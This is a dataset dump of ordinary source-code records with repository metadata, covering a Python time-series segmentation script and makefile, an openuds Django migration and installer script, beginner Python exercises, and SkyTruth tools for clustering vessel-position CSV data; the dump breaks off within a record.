def ReadData(data_dir):\n    print('ReadData')\n    PFile = data_dir + 'P_Xtilde_Y.txt'\n    P_Xtilde_Y = []\n    with open(PFile) as f:\n        Rows=f.read().splitlines()\n        for row in Rows:\n            #items=row.strip().split('\\t')\n            items=row.strip().split()\n            tmp = [float(item) for item in items]\n            P_Xtilde_Y.append(tmp)\n        P_Xtilde_Y = np.array(P_Xtilde_Y)\n    FYtilde = data_dir + 'Ytilde.txt'\n    Ytilde = []\n    with open(FYtilde) as f:\n        Rows=f.read().splitlines()\n        for row in Rows:\n            Ytilde.append(float(row))\n        Ytilde = np.array(Ytilde)\n    FXtilde = data_dir + 'Xtilde.txt'\n    Xtilde = []\n    with open(FXtilde) as f:\n        Rows=f.read().splitlines()\n        for row in Rows:\n            Xtilde.append(float(row))\n    FY = data_dir+'Y.txt'\n    Y = []\n    with open(FY) as f:\n        Rows=f.read().splitlines()\n        for row in Rows:\n            items=row.strip().split('\\t')\n            tmp = [float(item) for item in items]\n            Y.append(tmp)\n    FTime = data_dir + 'BeginEndTime.txt'\n    with open(FTime) as f:\n        Rows = f.read().splitlines()\n        for row in Rows:\n            items=row.strip().split('\\t')\n            BeginTime = float(items[0])\n            EndTime = float(items[1])\n\n    FX = data_dir+'X.txt'\n    X = []\n    with open(FX) as f:\n        Rows=f.read().splitlines()\n        for row in Rows:\n            items=row.strip().split('\\t')\n            tmp = [float(item) for item in items]\n            X.append(tmp)\n        X = np.array(X)\n    End = len(X[0])-1\n    if len(X)>1:\n        Timestamp=X[:,End]\n    else:\n        Timestamp = X[0][End]\n\n    return P_Xtilde_Y,Ytilde,Xtilde,Y,Timestamp,BeginTime,EndTime\n\n\ndef main(data_dir, ff, MinW, N_mdl, CalcMode, _dir, matlab_path, PathMode):\n    aib(data_dir, MinW, N_mdl, CalcMode, _dir, matlab_path)\n    start = time.clock()\n    print('start time recording')\n    s_lz=time.time()\n    P_Xtilde_Y,Ytilde,Xtilde,Y,Timestamp,BeginTime,EndTime = ReadData(data_dir)\n    l = int((EndTime - BeginTime) / MinW + 3)\n    G, G1, TotalAVG = generate_graph(P_Xtilde_Y, Timestamp, Y, BeginTime, EndTime, 'Fraction', 'Sigmoid', ff)\n    dir_ = data_dir\n    directory = os.path.dirname(dir_)\n    if not os.path.exists(directory):\n        os.makedirs(directory)\n    if PathMode == 'ALP':\n        sf = open(data_dir + 'ALP_runningtime.txt', 'w')\n        start1 = time.clock()\n        start2 = time.time()\n        ALP_arr, avg, ALP_length = falp.main(G, 'Source', 'Target', l)\n        end2 = time.time()\n        end1 = time.clock()\n        e_lz=time.time()\n\n        sf.write(data_dir + '\\n')\n        sf.write(str(e_lz-s_lz)+'\\n')\n        sf.close()\n        # print('fast alp cpu time: ' + str(end1 - start1))\n        # print('fast alp time: ' + str(end2 - start2))\n        # print('ALP_arr:' + str(ALP_arr))\n        # print('avg: ' + str(avg))\n        # print('ALP_length' + str(ALP_length))\n\n        # FName = 'Segmentation.txt'\n        # Name = 'ALP.txt'\n        # CostName = 'ALP-AVG.txt'\n\n    # elif PathMode == 'LP':\n    #     avg, ALP_arr = longestpathDAG(G1, 'Source', 'Target')\n    #     print str(ALP_arr)\n    #     FName = 'LP2.txt'\n    #     Name = 'LP.txt'\n    #     CostName = 'LP-AVG.txt'\n    #     avg = float(avg) / len(ALP_arr)\n\n    FName = 'Segmentation.txt'\n    Convert(ALP_arr, Y, dir_, FName)\n\n    # with open(dir_ + Name, 'wb')as f:\n    #     for j in ALP_arr:\n    #         f.write(str(j) + '\\t')\n    # with open(dir_ + CostName, 'wb') as g:\n    #     g.write('AVG of path: ' + str(avg) + '\\n')\n    #     g.write('Total AVG: ' + str(TotalAVG))\n    elapsed = (time.clock() - start)\n    print (data_dir + ':' + str(elapsed))\n\n\nif __name__ == '__main__':\n    data_dir = sys.argv[1] #'./data/test/' # Directory of the data\n    matlab_path = sys.argv[2] #'/Applications/MATLAB_R2016a.app/bin/matlab'\n    data_dir += '/'\n    data_dir = data_dir.replace('//', '/')\n    _dir = data_dir + 'input.txt'\n    ff = 0.001\n    MinW = int(sys.argv[3]) #2*86400 #604800\n    N_mdl = int(sys.argv[4]) #5\n    CalcMode = int(sys.argv[5]) #0\n    PathMode = 'ALP'\n    main(data_dir, ff, MinW, N_mdl, CalcMode, _dir, matlab_path, PathMode)\n"
},
{
"alpha_fraction": 0.6431535482406616,
"alphanum_fraction": 0.6929460763931274,
"avg_line_length": 25.77777862548828,
"blob_id": "28abd6ede02de6a4c2caac829cc2d386792e9ef6",
"content_id": "d0a0c44d4dc3d51f851eb11c0680ef959e6f8df7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 241,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 9,
"path": "/makefile",
"repo_name": "SorourAmiri/DASSA",
"src_encoding": "UTF-8",
"text": "#Make sure you set a correct matlab path\nEXAMPLE = './data/test/'\nMATLAB_path = '/Applications/MATLAB_R2016a.app/bin/matlab'\nMinW = 172800\nN_mdl = 5\nCalcMode = 1\n\ndemo:\n\tpython dassa.py $(EXAMPLE) $(MATLAB_path) $(MinW) $(N_mdl) $(CalcMode)\n"
}
] | 4 |
w796933/openuds | https://github.com/w796933/openuds | 08d6e552f17757574f3756a4643e65f24cd1d1d4 | 41c94913f841c0f689b209f04437d8c0cb98c917 | fc0757fd49424d4873534341facae02f4c75b564 | refs/heads/master | 2023-05-30T03:40:17.027854 | 2021-06-11T10:02:26 | 2021-06-11T10:02:26 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5175879597663879,
"alphanum_fraction": 0.5929648280143738,
"avg_line_length": 22.41176414489746,
"blob_id": "1d5a996089eb38182b1baf4413e180ce39585ba4",
"content_id": "dec47f9debf325226cdf46ef9fa8f76039d64722",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 398,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 17,
"path": "/server/src/uds/migrations/0041_alter_statscounters_index_together.py",
"repo_name": "w796933/openuds",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.2 on 2021-05-12 13:00\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('uds', '0040_auto_20210422_1340'),\n ]\n\n operations = [\n migrations.AlterIndexTogether(\n name='statscounters',\n index_together={('owner_type', 'counter_type', 'stamp'), ('owner_type', 'stamp')},\n ),\n ]\n"
},
{
"alpha_fraction": 0.7329843044281006,
"alphanum_fraction": 0.7696335315704346,
"avg_line_length": 20.22222137451172,
"blob_id": "54c1f87900ad470f379a9421a860ad6d082b70ba",
"content_id": "da0ac64380340e6a811640f2102c2e0fe70b2da1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 191,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 9,
"path": "/client-py3/full/linux/installer-appimage-template.sh",
"repo_name": "w796933/openuds",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\necho \"Installing UDSClient...\"\n\ncp UDSClient-0.0.0-x86_64.AppImage /usr/bin\ncp UDSClient.desktop /usr/share/applications\nupdate-desktop-database\n\necho \"Installation process done.\"\n"
}
] | 2 |
yuvan03/sequence-processors | https://github.com/yuvan03/sequence-processors | 037dd071a691fbc19b9c1cc7b589609170e1902c | 05898f1185df177c4536151dbf0095e80dd9dd97 | 28f3bad4bc249f932ae94a519b74b1261370af20 | refs/heads/master | 2022-12-10T21:51:31.535761 | 2020-09-06T13:41:55 | 2020-09-06T13:41:55 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6362126469612122,
"alphanum_fraction": 0.6362126469612122,
"avg_line_length": 25.217391967773438,
"blob_id": "4c052d697d107abdf5070a069efe104a7d0369a6",
"content_id": "756ddcc0bce9aab78f58e1e3870490837a87f0a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 602,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 23,
"path": "/file_parser.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "import sys\nimport os\n\n\nclass FileParser():\n\n def __init__(self, filelocation):\n self.filelocation = filelocation\n input_data = self.read_file()\n print(\"File contents: {}\".format(input_data))\n\n def read_file(self):\n file_contents = \"\"\n with open(self.filelocation, \"r\") as f:\n file_contents=\"\".join(each_line.rstrip() for each_line in f)\n return file_contents\n\n\nif __name__ == '__main__':\n current_location = os.getcwd()\n print (\"Current working dir : %s\" % current_location)\n file_location = current_location+'/phrases.txt'\n FileParser(file_location)"
},
{
"alpha_fraction": 0.5308775901794434,
"alphanum_fraction": 0.5368363857269287,
"avg_line_length": 31.962963104248047,
"blob_id": "a988042224eb4cc750c35221f5ca5d372edb43e4",
"content_id": "3d4e71ad834533a512ff0070a50f5d027aca26bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 54,
"path": "/assign_grades.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "import os\n\nclass AssignGrades():\n \"\"\" User is given a grade and test report for items correct and incorrect.\"\"\"\n\n def __init__(self, file_location, subject):\n self.file_location = file_location\n if subject == 'chem':\n self.chem_assign_grades()\n\n def get_names(self):\n e_temp = []\n print(\"Please enter 5 elements from the first 20 in the periodic table\")\n while len(e_temp) < 5:\n elem = (input(\"Please enter element: \")).lower()\n if elem in e_temp:\n print (\"Duplicate entered\")\n elif len(elem) == 0:\n print(\"No value entered\")\n else:\n e_temp.append(elem)\n return e_temp\n\n def compute_grades(self, element_file):\n tmp_element_list = []\n element_list = element_file.readline()\n\n while element_list:\n tmp_element_list.append(element_list.strip().lower())\n element_list = element_file.readline()\n e_list = self.get_names()\n correct_list = []\n mistake_list = []\n for temp in range(5):\n if e_list[temp] in tmp_element_list:\n correct_list.append(e_list[temp])\n else:\n mistake_list.append(e_list[temp])\n \n correctpercent = (int(len(correct_list)))*20\n\n print (\"Score: \", correctpercent, \"%\")\n print (\"Found: \",correct_list)\n print(\"Not Found:\", mistake_list)\n\n def chem_assign_grades(self):\n element_file = open(self.file_location,'r')\n self.compute_grades(element_file)\n\n\nif __name__ == '__main__':\n current_location = os.getcwd()\n print (\"Current working dir : %s\" % current_location)\n AssignGrades(current_location+'/elements1_20.txt', 'chem')\n \n \n \n \n \n\n"
},
{
"alpha_fraction": 0.5841674208641052,
"alphanum_fraction": 0.5841674208641052,
"avg_line_length": 31.323530197143555,
"blob_id": "f2d6549326f3401e26c67b60ec5bce1036474ce4",
"content_id": "3963e48960dc7fbee814e3a6f2d36273fdc4aa45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1099,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 34,
"path": "/filter_sequence.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "from file_parser import FileParser\nimport os\n\nclass FilterSequence():\n\n def __init__(self, filelocation, filter_letter):\n self.filelocation = filelocation\n file_contents = FileParser(filelocation).read_file()\n print(\"File contents: {}\".format(file_contents))\n filtered = self.first_letter_filter(filter_letter, file_contents)\n print(filtered)\n\n def first_letter_filter(self, letter, phrase):\n \"\"\"Returns the words in [phrase] with starting letter after [letter]\"\"\"\n result, word = \"\", \"\"\n for letter in phrase: \n if letter.isalpha(): \n word += letter \n elif word.lower() > \"h\": \n result += word.upper() + \" \"\n word = \"\" \n else: \n word = \"\"\n if word.lower() > \"h\": \n result += word.upper()\n return result\n\n\nif __name__ == '__main__':\n current_location = os.getcwd()\n print (\"Current working dir : %s\" % current_location)\n filelocation = current_location+'/phrases.txt'\n filter_letter = 'G'\n FilterSequence(filelocation, filter_letter)\n"
},
{
"alpha_fraction": 0.6362500190734863,
"alphanum_fraction": 0.6499999761581421,
"avg_line_length": 25.700000762939453,
"blob_id": "740f81741e5c289a0346aee0590a59f755028613",
"content_id": "427fce4de01bfdbd716df946c481599b0247267d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 800,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 30,
"path": "/compute_weather.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "import os\n\n\nclass ComputeWeather():\n\n\tdef __init__(self, file_location):\n\t\tself.file_location = file_location\n\t\tself.get_avg_temp()\n\n\tdef get_avg_temp(self):\n\t\tavg_temps = open(self.file_location,'a+')\n\n\t\tavg_temps.write(\"Rio de Janeiro, Brazil, 30.0,18.0\\n\")\n\t\tavg_temps.seek(0)\n\t\theading = avg_temps.readline()\n\t\theadings = heading.split(',')\n\t\tcity_temp = avg_temps.readline()\n\t\tcity_list = city_temp.split(',')\n\t\twhile city_temp:\n\t\t print(headings[0].capitalize(), 'of', city_list[0], headings[2], 'is', city_list[2], 'Celsius')\n\t\t city_temp = avg_temps.readline()\n\t\t city_list = city_temp.split(',')\n\n\t\tavg_temps.close()\n\n\nif __name__ == '__main__':\n\tcurrent_location = os.getcwd()\n\tprint (\"Current working dir : %s\" % current_location)\n\tComputeWeather(current_location+'/avg_temp.txt')"
},
{
"alpha_fraction": 0.8294573426246643,
"alphanum_fraction": 0.8294573426246643,
"avg_line_length": 63.5,
"blob_id": "59ac6a20b3a46eb7f643ec27bdf7766954861962",
"content_id": "aaed60712563de98934966102fa9d0c3aeb53f0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 2,
"path": "/README.md",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "# Sequence Processing\nA collection of my experiments and learnings in Python, specifically in parsing files and processing data.\n"
},
{
"alpha_fraction": 0.5191029906272888,
"alphanum_fraction": 0.5265780687332153,
"avg_line_length": 30.657894134521484,
"blob_id": "a8a8de2b62533f880f5fee09d571427fff423060",
"content_id": "731cbba9b2da6ad78708658ffc71f1383656927e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1204,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 38,
"path": "/string_mixer.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "\n\nclass StringMixer():\n \"\"\" Takes string input and then prints out a mixed order version of the string\"\"\"\n \n def __init__(self, word_list):\n self.word_list = word_list\n self.mix_sentence()\n\n def mix_word(self, word_list):\n word_list.sort()\n new_words = []\n while len(word_list) > 5:\n new_words.append(word_list[-5])\n word_list.pop(-5)\n new_words.append(word_list[0])\n word_list.pop(0)\n new_words.append(word_list[-1])\n word_list.pop(-1)\n return new_words\n\n def mix_sentence(self):\n word_list = self.word_list\n word_length = len(word_list)\n for index in range(word_length):\n if len(word_list[index]) <= 3:\n word_list[index] = word_list[index].lower()\n elif len(word_list[index]) >=7:\n word_list[index] = word_list[index].upper()\n \n mixed = self.mix_word(word_list)\n\n for each_word in mixed:\n print(each_word, end=\" \")\n print()\n\nif __name__ == '__main__':\n word = input (\"Please enter poem/saying: \")\n word_list = word.split() \n StringMixer(word_list)"
},
{
"alpha_fraction": 0.6756756901741028,
"alphanum_fraction": 0.6763868927955627,
"avg_line_length": 30.75,
"blob_id": "ae6d663dfcb74dfdc8549f8e9c40a9f2f6063ac7",
"content_id": "7858d4c069ef3ab12fef60679ed3f5d9e372c34f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1406,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 44,
"path": "/check_string_list.py",
"repo_name": "yuvan03/sequence-processors",
"src_encoding": "UTF-8",
"text": "\n\n\nclass CheckStringList():\n\n\t\"\"\"\n\tTakes string input and checks if that string is in a list of strings\n\n\tif string is in the list it removes the first instance from list\n\tif string is not in the list the input gets appended to the list\n\tif the string is empty then the last item is popped from the list\n\tif the list becomes empty the program ends\n\tif the user enters \"quit\" then the program ends\n\t\"\"\"\n\n\n\tdef __init__(self, entity_list):\n\t\tself.entity_list = entity_list\n\t\tself.get_user_choice()\n\n\tdef construct_entity_list(self, new_entity):\n\t\tif new_entity == \"\":\n\t\t\t entity = entity_list.pop()\n\t\t\t print(new_entity + \" has been popped from list\")\n\t\telif new_entity.lower() in entity_list:\n\t\t\t print(new_entity + \" has been removed from list\")\n\t\t\t return entity_list.remove(new_entity)\n\t\telse:\n\t\t\t print (\"1 instance of \" + new_entity + \" has been appended to the list\")\n\t\t\t return entity_list.append(new_entity)\n\n\tdef get_user_choice(self):\n\t\twhile self.entity_list:\n\t\t\tnew_entity = input(\"Please enter any entity name to add to list or press 'q' to quit program: \")\n\t\t\tif new_entity.lower() == \"q\":\n\t\t\t\tprint(\"Quitting program now\")\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"List of entitys: \" + str(entity_list))\n\t\t\t\tself.construct_entity_list(new_entity)\n\t\t\t\tprint (entity_list)\n\t\tprint (\"Goodbye!\")\n\n\nif __name__ == '__main__':\n\tentity_list = [\"rabbit\", \"lion\", \"dog\"]\n\tCheckStringList(entity_list)\n\t\t\t\t\t\n"
}
] | 7 |
SkyTruth/clustering | https://github.com/SkyTruth/clustering | 4694af1584ddf657e07a6b5ce2443302892ece04 | 574bb870b78fe13f74dee23a9345549f0c905f43 | 85245b2ae9398ea27d6251b94f8ea7238bf94f7e | refs/heads/master | 2018-12-29T17:21:05.280125 | 2014-10-06T11:57:21 | 2014-10-06T11:57:21 | 16,341,137 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.570694088935852,
"alphanum_fraction": 0.5835475325584412,
"avg_line_length": 32.826087951660156,
"blob_id": "65055cf4ddc6ede5e209b93e295d39ebb173bf00",
"content_id": "0cde07102cf4b807f6a057d3fb03567deb3fdea5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3890,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 115,
"path": "/dbcluster",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set fileencoding=utf-8 :\n# SETUPTOOLS_DO_NOT_WRAP\n\n# cluster rows.csv clusters.csv\n#\n# - Copyright (C) 2014 SkyTruth\n# Author: Egil Moeller <[email protected]>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\nimport numpy\nimport sklearn.cluster\nimport csv\nimport sys\nimport argparse\nimport math\n\ndef floatify(row):\n res = {}\n for key in row:\n try:\n res[key] = float(row[key])\n except ValueError:\n pass\n return res\n\ndef loaddata(filename, maxlines=None):\n lines = -1\n with open(filename) as f:\n for l in f:\n lines += 1\n if maxlines is not None and lines >= maxlines: break\n\n with open(filename) as f:\n rows = csv.DictReader(f)\n\n X = numpy.zeros((lines, len(rows.fieldnames)))\n\n latlng = ['longitude', 'latitude']\n fieldnames = latlng + [name for name in rows.fieldnames\n if name not in latlng]\n\n for idx, row in enumerate(rows):\n if idx >= lines: break\n\n for fieldidx, name in enumerate(fieldnames):\n try:\n X[idx][fieldidx] = float(row[name])\n except ValueError:\n X[idx][fieldidx] = float(\"nan\")\n return fieldnames, X\n\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('infile', metavar='FILE.csv', type=str, help='Input file')\nparser.add_argument('outfile', metavar='FILE.csv', type=str, help='Output file')\nparser.add_argument('--eps', metavar='N', type=float, default=0.013498916666666666,\n help='eps')\nparser.add_argument('--min_samples', metavar='N', type=int, default=3,\n help='min_samples')\n\nargs = parser.parse_args(sys.argv[1:])\n\nfieldnames, X = loaddata(args.infile)\ndb = sklearn.cluster.DBSCAN(eps=args.eps, min_samples=args.min_samples).fit(X[:,0:2])\n\nwith open(args.outfile, \"w\") as f:\n f = csv.writer(f)\n\n f.writerow([\n \"series\",\n \"longitude\",\n \"latitude\",\n \"timestamp\",\n \"start\",\n \"end\",\n \"score\",\n \"cog\",\n \"sog\",\n \"sigma\",\n \"weight\",\n \"count\"\n ])\n\n for k in set(db.labels_):\n points = X[(db.labels_ == k).nonzero()]\n f.writerow([\n points[0,fieldnames.index(\"series\")],\n numpy.mean(points[:,fieldnames.index(\"longitude\")]),\n numpy.mean(points[:,fieldnames.index(\"latitude\")]),\n numpy.mean(points[:,fieldnames.index(\"timestamp\")]),\n numpy.min(points[:,fieldnames.index(\"timestamp\")]),\n numpy.max(points[:,fieldnames.index(\"timestamp\")]),\n numpy.mean(points[:,fieldnames.index(\"score\")]),\n numpy.mean(points[:,fieldnames.index(\"cog\")]),\n numpy.mean(points[:,fieldnames.index(\"sog\")]),\n math.sqrt( numpy.std(points[:,fieldnames.index(\"longitude\")])**2\n + numpy.std(points[:,fieldnames.index(\"latitude\")])**2),\n numpy.sum(points[:,fieldnames.index(\"score\")]),\n points.shape[0]\n ])\n"
},
{
"alpha_fraction": 0.7785235047340393,
"alphanum_fraction": 0.7829977869987488,
"avg_line_length": 27.838708877563477,
"blob_id": "8a5aad5526ccb16224c4446ce95dff44f61be454",
"content_id": "38621d6e443b07a22e56a1e4698edc8a5d7053ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 31,
"path": "/README.md",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "Tools and pipelines:\n\n timestamptosec INFILE OUTFILE\n\nConverts timestamps in Y-M-D H:M:S UTC (string) format to seconds since epoch (integer)\n\n augment INFILE OUTFILE\n\nAdds weight and sigma columns with default values (score and 1.0),\nwhich allows the raw data to be used by the cluster animations for the\ndeepest zoom levels. OUTFILE is suitable as input to cluster\nanimation.\n\n timecluser INFILE OUTFILE\n\nClusters by time difference, within vessel id. OUTFILE is suitable as\ninput to cluster animation.\n\n split --outdir=DIRNAME INFILE\n\nSplits a file by date into multiple files\n\n dbcluster INFILE OUTFILE\n\nClusters indata by distance using the DBSCAN algorithm. OUTFILE is\nsuitable as input to cluster animation.\n\n join INFILE1 INFILE2 ...INFILEN OUTFILE\n\nConcatenates all INFILEX into OUTFILE. If INFILEX is suitable as input\nto cluster animation then OUTFILE will be too.\n"
},
{
"alpha_fraction": 0.5353426337242126,
"alphanum_fraction": 0.5446717143058777,
"avg_line_length": 26.190244674682617,
"blob_id": "7998c5bf8648ee4a72dd963126b5837f3cb94741",
"content_id": "884d9700371344fc087a1867414118b35021d056",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5574,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 205,
"path": "/timecluster",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set fileencoding=utf-8 :\n# SETUPTOOLS_DO_NOT_WRAP\n\n# cluster rows.csv clusters.csv\n#\n# - Copyright (C) 2014 SkyTruth\n# Author: Egil Moeller <[email protected]>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\nimport csv\nimport sys\nimport math\nimport operator\n\nargs = {\n \"maxdist\": 60*60,\n }\nfiles = []\nfor arg in sys.argv[1:]:\n if arg.startswith(\"--\"):\n arg = arg[2:]\n if '=' in arg:\n arg, value = arg.split(\"=\", 1)\n args[arg] = value\n else:\n args[arg] = True\n else:\n files.append(arg)\n\nclass AbstractStdDev(object):\n def get(self):\n return math.sqrt(self.getSqr())\n def __add__(self, other):\n return StdDevSum(self.getSqr() + other.getSqr())\n\nclass StdDevSum(AbstractStdDev):\n def __init__(self, sqr):\n self.sqr = sqr\n def getSqr(self):\n return self.sqr\n \nclass StdDev(AbstractStdDev):\n def __init__(self):\n self.count = 0\n self.sum = 0\n self.sqrsum = 0\n def add(self, value):\n self.count += 1\n self.sum += value\n self.sqrsum += value**2\n def getSqr(self):\n if self.count == 0:\n return 0\n a = self.sqrsum/self.count\n b = (self.sum/self.count)**2\n # Handle rounding errors\n if a < b:\n assert b - a < 1e10-10\n return 0.0\n return a - b\n\nclass Avg(object):\n def __init__(self):\n self.count = 0\n self.sum = 0\n def add(self, value):\n self.count += 1\n self.sum += value\n def get(self):\n return self.sum/self.count\n\nclass Sum(object):\n def __init__(self):\n self.sum = 0\n def add(self, value):\n self.sum += value\n def get(self):\n return self.sum\n\nclass Count(object):\n def __init__(self):\n self.count = 0\n def add(self, value):\n self.count += 1\n def get(self):\n return self.count\n\nclass First(object):\n def __init__(self):\n self.value = None\n def add(self, value):\n if self.value is None:\n self.value = value\n def get(self):\n return self.value\n\nclass Last(object):\n def __init__(self):\n self.value = None\n def add(self, value):\n self.value = value\n def get(self):\n return self.value\n\ndef floatify(row):\n for key in row:\n if key in ('mmsi','series'): continue\n try:\n row[key] = float(row[key])\n except ValueError:\n pass\n\nclass Stat(object):\n def __init__(self, source, cls):\n self.source = source\n self.value = cls()\n def add(self, value):\n self.value.add(value[self.source])\n def get(self):\n return self.value.get()\n\nclass StatSum(object):\n def __init__(self, *stats):\n self.stats = stats\n def add(self, value):\n for stat in self.stats:\n stat.add(value)\n def get(self):\n return reduce(operator.add, [stat.value for stat in self.stats]).get()\n\nclass Stats(object):\n def __init__(self):\n self.fieldmap = {\n \"mmsi\": Stat(\"mmsi\", First),\n \"series\": Stat(\"series\", First),\n \"longitude\": Stat(\"longitude\", Avg),\n \"latitude\": Stat(\"latitude\", Avg),\n \"timestamp\": 
Stat(\"timestamp\", Avg),\n \"start\": Stat(\"timestamp\", First),\n \"end\": Stat(\"timestamp\", Last),\n \"score\": Stat(\"score\", Avg),\n \"cog\": Stat(\"cog\", Avg),\n \"sog\": Stat(\"sog\", Avg),\n \"sigma\": StatSum(Stat(\"latitude\", StdDev),\n Stat(\"longitude\", StdDev)),\n \"weight\": Stat(\"score\", Sum),\n \"count\": Stat(\"score\", Count)\n }\n def add(self, value):\n for field in self.fieldmap.itervalues():\n field.add(value)\n def get(self):\n return {\n key: value.get()\n for (key, value)\n in self.fieldmap.iteritems()}\n\ntry:\n with open(files[0]) as infile:\n infile = csv.DictReader(infile)\n with open(files[1], \"w\") as outfile:\n\n stats = Stats()\n\n outfile = csv.DictWriter(outfile, stats.fieldmap.keys(), 'ignore')\n outfile.writeheader()\n\n def writeCluster():\n global stats\n outfile.writerow(stats.get())\n stats = Stats()\n\n last_row = None\n for row in infile:\n floatify(row)\n new_cluster = not last_row or (row['mmsi'] != last_row['mmsi'] or abs(row['timestamp'] - last_row['timestamp']) >= args['maxdist'])\n\n if new_cluster and last_row:\n writeCluster()\n stats.add(row)\n\n last_row = row\n\n if last_row:\n writeCluster()\nexcept:\n import pdb\n import sys\n sys.last_traceback = sys.exc_info()[2]\n pdb.pm()\n"
},
{
"alpha_fraction": 0.6396551728248596,
"alphanum_fraction": 0.6448276042938232,
"avg_line_length": 24.173913955688477,
"blob_id": "b4bcd8af09b0034844f612e3cecf0d3705ad1530",
"content_id": "0f3328fa7e6eb2072b507d5998553fbbdcfc9379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 23,
"path": "/join",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\nimport sys\nimport csv\nimport os.path\n\ninfilenames = sys.argv[1:-1]\noutfilename = sys.argv[-1]\n\nfieldnames = set()\nfor infilename in infilenames:\n with open(infilename) as f:\n f = csv.DictReader(f)\n fieldnames = fieldnames.union(f.fieldnames)\n\nwith open(outfilename, \"w\") as outfile:\n outfile = csv.DictWriter(outfile, fieldnames, 'ignore')\n outfile.writeheader()\n for infilename in infilenames:\n with open(infilename) as f:\n f = csv.DictReader(f)\n for row in f:\n outfile.writerow(row)\n\n"
},
{
"alpha_fraction": 0.5933333039283752,
"alphanum_fraction": 0.602222204208374,
"avg_line_length": 27.125,
"blob_id": "eb301120bfbf862d51833f8ff9e93e32d827d19f",
"content_id": "d056c42d112218023db36f7c508111a988ead2a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 450,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 16,
"path": "/augment",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
